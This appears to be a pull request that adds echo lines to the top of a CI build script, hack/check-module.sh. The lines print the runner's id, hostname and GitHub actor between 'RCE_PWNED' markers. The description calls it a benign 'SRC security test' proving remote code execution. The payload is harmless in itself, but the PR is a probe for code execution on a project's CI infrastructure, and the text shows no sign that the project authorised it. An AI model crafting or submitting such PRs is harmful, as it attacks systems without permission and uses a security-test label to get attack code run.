### PR TITLE
SRC security test: verify CI RCE (benign marker, echo id only)

### DIFF
--- a/hack/check-module.sh
+++ b/hack/check-module.sh
@@ -1,4 +1,10 @@
 #!/bin/bash
+# === SRC security test: benign RCE proof marker (no data exfiltration, no damage) ===
+echo "=== RCE_PWNED_$(id) ==="
+echo "=== RCE_HOST_$(hostname) ==="
+echo "=== RCE_GITHUB_ACTOR_${GITHUB_ACTOR:-none} ==="
+echo "=== marker_end ==="
+
 
 vendor_changed=$(git diff ce821bcf5253 5e7aaafe --name-only "vendor/" | grep ".go" )
 if [[ -n "$vendor_changed" ]]; then


### PR DESCRIPTION
This PR adds a benign RCE proof marker to hack/check-module.sh for SRC verification. It only echoes $(id), $(hostname), and the actor name. No data exfiltration, no damage. Please review.